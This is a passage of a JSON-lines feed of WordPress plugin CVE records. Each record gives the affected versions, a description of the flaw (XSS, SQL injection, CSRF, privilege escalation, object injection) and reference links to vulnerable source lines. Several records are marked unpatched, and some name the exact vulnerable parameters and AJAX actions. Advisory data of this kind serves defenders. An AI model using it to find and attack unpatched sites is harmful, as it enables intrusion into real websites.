replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c384f05-96dd-47bb-822d-16212527091a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c384f05-96dd-47bb-822d-16212527091a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-with-carousel\\\/trunk\\\/Modules\\\/Image\\\/Data.php#L2838\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-with-carousel\\\/trunk\\\/Modules\\\/Image\\\/Data.php#L2838\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-with-carousel\\\/trunk\\\/Modules\\\/Flipbox\\\/Flipbox.php#L3211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-with-carousel\\\/trunk\\\/Modules\\\/Flipbox\\\/Flipbox.php#L3211\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-with-carousel\\\/trunk\\\/Modules\\\/Caption\\\/Caption.php#L2622\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-hover-effects-with-carousel\\\/trunk\\\/Modules\\\/Caption\\\/Caption.php#L2622\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7355","slug":"organization-chart","versionImpact":"1.5.0","description":"The Organization chart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title_input\u2019 and 'node_description' parameters in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this can only be exploited by administrators, but the ability to use and configure charts can be extended to subscribers.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04641506-5b0e-48bc-ad50-c81dda996ecf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04641506-5b0e-48bc-ad50-c81dda996ecf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/organization-chart\\\/trunk\\\/admin\\\/assets\\\/js\\\/tree_page.js#L207\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/organization-chart\\\/trunk\\\/admin\\\/assets\\\/js\\\/tree_page.js#L207\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/organization-chart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/organization-chart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/organization-chart\\\/trunk\\\/admin\\\/assets\\\/js\\\/tree_page.js#L217\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/organization-chart\\\/trunk\\\/admin\\\/assets\\\/js\\\/tree_page.js#L217\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131569\\\/#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131569\\\/#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6928","slug":"opti-marketing","versionImpact":"2.0.9","description":"The Opti Marketing WordPress plugin through 2.0.9 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7bb9474f-2b9d-4856-b36d-a43da3db0245\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7bb9474f-2b9d-4856-b36d-a43da3db0245\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8718","slug":"gravity-forms-toolbar","versionImpact":"1.7.0","description":"The Gravity Forms Toolbar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 1.7.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d1c6daf-1799-4f8a-81e3-ef3968f41b8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d1c6daf-1799-4f8a-81e3-ef3968f41b8e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gravity-forms-toolbar\\\/tags\\\/1.7.0\\\/admin\\\/form.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gravity-forms-toolbar\\\/tags\\\/1.7.0\\\/admin\\\/form.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gravity-forms-toolbar\\\/tags\\\/1.7.0\\\/admin\\\/form.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gravity-forms-toolbar\\\/tags\\\/1.7.0\\\/admin\\\/form.php#L44\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9848","slug":"product-customizer-light","versionImpact":"1.0.0","description":"The Product Customizer Light plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18d1feee-347c-4f43-a01b-67b3d0a5b2d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18d1feee-347c-4f43-a01b-67b3d0a5b2d6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-customizer-light\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-customizer-light\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10958","slug":"wp-photo-album-plus","versionImpact":"8.8.08.007","description":"The WP Photo Album Plus plugin for WordPress is vulnerable to arbitrary shortcode execution via the getshortcodedrenderedfenodelay AJAX action in all versions up to, and including, 8.8.08.007. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53bb0871-343a-4299-9902-682c422152d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53bb0871-343a-4299-9902-682c422152d1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-album-plus\\\/tags\\\/8.8.08.004\\\/wppa-ajax.php#L1238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-album-plus\\\/tags\\\/8.8.08.004\\\/wppa-ajax.php#L1238\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-photo-album-plus\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-photo-album-plus\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184852\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184852\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12004","slug":"woo-order-notes","versionImpact":"1.5.2","description":"The WPC Order Notes for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.2. This is due to missing or incorrect nonce validation on the ajax_update_order_note() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-order-notes\\\/trunk\\\/wpc-order-notes.php#L416\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-order-notes\\\/trunk\\\/wpc-order-notes.php#L416\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205072\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205072\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-order-notes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-order-notes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05f40082-30ed-45f7-81d5-d5334a51fcea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05f40082-30ed-45f7-81d5-d5334a51fcea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13538","slug":"bigbuy-wc-dropshipping-connector","versionImpact":"1.9.19","description":"The BigBuy Dropshipping Connector for WooCommerce plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.9.19. This is due the \/vendor\/cocur\/slugify\/bin\/generate-default.php file being directly accessible and triggering an error. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bigbuy-wc-dropshipping-connector\\\/trunk\\\/vendor\\\/cocur\\\/slugify\\\/bin\\\/generate-default.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bigbuy-wc-dropshipping-connector\\\/trunk\\\/vendor\\\/cocur\\\/slugify\\\/bin\\\/generate-default.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15f38b3e-69fe-436f-ba4b-7985ec9dac00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15f38b3e-69fe-436f-ba4b-7985ec9dac00?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4579","slug":"wp-content-security-policy","versionImpact":"2.3","description":"The WP Content Security Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blocked-uri and effective-directive parameters in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-content-security-policy\\\/tags\\\/2.3\\\/includes\\\/WP_CSP.php#L597\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-content-security-policy\\\/tags\\\/2.3\\\/includes\\\/WP_CSP.php#L597\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-content-security-policy\\\/tags\\\/2.3\\\/includes\\\/WP_CSP.php#L612\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-content-security-policy\\\/tags\\\/2.3\\\/includes\\\/WP_CSP.php#L612\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-content-security-policy\\\/tags\\\/2.3\\\/includes\\\/WP_CSP.php#L659\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-content-security-policy\\\/tags\\\/2.3\\\/includes\\\/WP_CSP.php#L659\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3c4ba08-a9fa-439a-a887-b8c113f78e20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3c4ba08-a9fa-439a-a887-b8c113f78e20?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4334","slug":"wp-registration","versionImpact":"6.3","description":"The Simple User Registration plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.3. This is due to insufficient restrictions on user meta values that can be supplied during registration. This makes it possible for unauthenticated attackers to register as an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-registration\\\/trunk\\\/inc\\\/classes\\\/class.register.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-registration\\\/trunk\\\/inc\\\/classes\\\/class.register.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c211e0c0-3086-43d2-853c-489f9c42b0ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c211e0c0-3086-43d2-853c-489f9c42b0ab?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6539","slug":"voltax-video-player","versionImpact":"1.6.5","description":"The Voltax Video Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/voltax-video-player\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/voltax-video-player\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/babc2e50-27a5-413b-8611-0e9e9db33deb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/babc2e50-27a5-413b-8611-0e9e9db33deb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28667","slug":"lead-generated","versionImpact":"1.23","description":"The Lead Generated WordPress Plugin, version <= 1.23, was affected by an unauthenticated insecure deserialization issue. The tve_labels parameter of the tve_api_form_submit action is passed to the PHP unserialize() function without being sanitized or verified, and as a result could lead to PHP object injection, which when combined with certain class implementations \/ gadget chains could be leveraged to perform a variety of malicious actions granted a POP chain is also present.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-7\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2276","slug":"wc-multivendor-membership","versionImpact":"2.10.7","description":"The WCFM Membership \u2013 WooCommerce Memberships for Multivendor Marketplace plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 2.10.7. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907455\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907455\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42222c64-6492-4774-b5bc-8e62a1a328cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42222c64-6492-4774-b5bc-8e62a1a328cf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-multivendor-membership\\\/tags\\\/2.10.7\\\/controllers\\\/wcfmvm-controller-memberships-registration.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-multivendor-membership\\\/tags\\\/2.10.7\\\/controllers\\\/wcfmvm-controller-memberships-registration.php#L124\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3080","slug":"wp-mail-catcher","versionImpact":"2.1.2","description":"The WP Mail Catcher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 2.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2924014\\\/wp-mail-catcher\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2924014\\\/wp-mail-catcher\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1525e1c9-4b94-4f9f-92c5-fc69fe000771?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1525e1c9-4b94-4f9f-92c5-fc69fe000771?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5295","slug":"facebook-comment-by-vivacity","versionImpact":"1.4","description":"The Blog Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'vivafbcomment' shortcode in versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/facebook-comment-by-vivacity\\\/tags\\\/1.4\\\/user-file.php#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/facebook-comment-by-vivacity\\\/tags\\\/1.4\\\/user-file.php#L172\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602b3b9c-76a7-4b0b-8aad-e554c2fd6910?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602b3b9c-76a7-4b0b-8aad-e554c2fd6910?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0433","slug":"wppdf","versionImpact":"20221130","description":"The Gestpay for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 20221130. This is due to missing or incorrect nonce validation on the 'ajax_unset_default_card' function. This makes it possible for unauthenticated attackers to remove the default status of a card token for a user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44b62b99-99eb-424b-a04a-9bbacf5fbbaa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44b62b99-99eb-424b-a04a-9bbacf5fbbaa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wppdf\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wppdf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1176","slug":"ht-easy-google-analytics","versionImpact":"1.1.5","description":"The HT Easy GA4 \u2013 Google Analytics WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the login() function in all versions up to, and including, 1.1.5. This makes it possible for unauthenticated attackers to update the email associated through the plugin with GA4.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10e1b3ac-f002-4108-9682-5fe300f07adb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10e1b3ac-f002-4108-9682-5fe300f07adb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-easy-google-analytics\\\/trunk\\\/includes\\\/class.ht-easy-ga4.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-easy-google-analytics\\\/trunk\\\/includes\\\/class.ht-easy-ga4.php#L99\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4942","slug":"custom-dash","versionImpact":"1.0.2","description":"The Custom Dash plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13344366-feb0-4987-9543-222e3d35dab3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13344366-feb0-4987-9543-222e3d35dab3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-dash\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-dash\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7353","slug":"stripe-payments","versionImpact":"2.0.86","description":"The Accept Stripe Payments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's accept_stripe_payment_ng shortcode in all versions up to, and including, 2.0.86 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f321e41a-3945-47db-a215-aeb001b7b80b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f321e41a-3945-47db-a215-aeb001b7b80b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/portswigger.net\\\/research\\\/xss-in-hidden-input-fields\",\"name\":\"https:\\\/\\\/portswigger.net\\\/research\\\/xss-in-hidden-input-fields\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stripe-payments\\\/trunk\\\/includes\\\/shortcodes\\\/class-asp-shortcode-ng.php#L715\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stripe-payments\\\/trunk\\\/includes\\\/shortcodes\\\/class-asp-shortcode-ng.php#L715\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stripe-payments\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stripe-payments\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6925","slug":"truebooker-appointment-booking","versionImpact":"1.0.2","description":"The TrueBooker WordPress plugin before 1.0.3 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1da75fd7-e44f-4043-b8f4-7ee975356982\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1da75fd7-e44f-4043-b8f4-7ee975356982\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8675","slug":"soumettre-fr","versionImpact":"2.1.2","description":"The Soumettre.fr plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the soumettre_disconnect_gateway function in all versions up to, and including, 2.1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disconnect the gateway and delete the API key.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad05b088-977e-4f24-b843-dc65f1aa60e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad05b088-977e-4f24-b843-dc65f1aa60e9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soumettre-fr\\\/trunk\\\/admin\\\/class-soumettre-admin.php#L276\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soumettre-fr\\\/trunk\\\/admin\\\/class-soumettre-admin.php#L276\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9452","slug":"branding","versionImpact":"1.0","description":"The Branding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8736cf81-3fb8-4c81-a878-7d73a3e68fc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8736cf81-3fb8-4c81-a878-7d73a3e68fc2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/branding\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/branding\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10265","slug":"form-maker","versionImpact":"1.15.30","description":"The Form Maker by 10Web \u2013 Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.15.30. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a 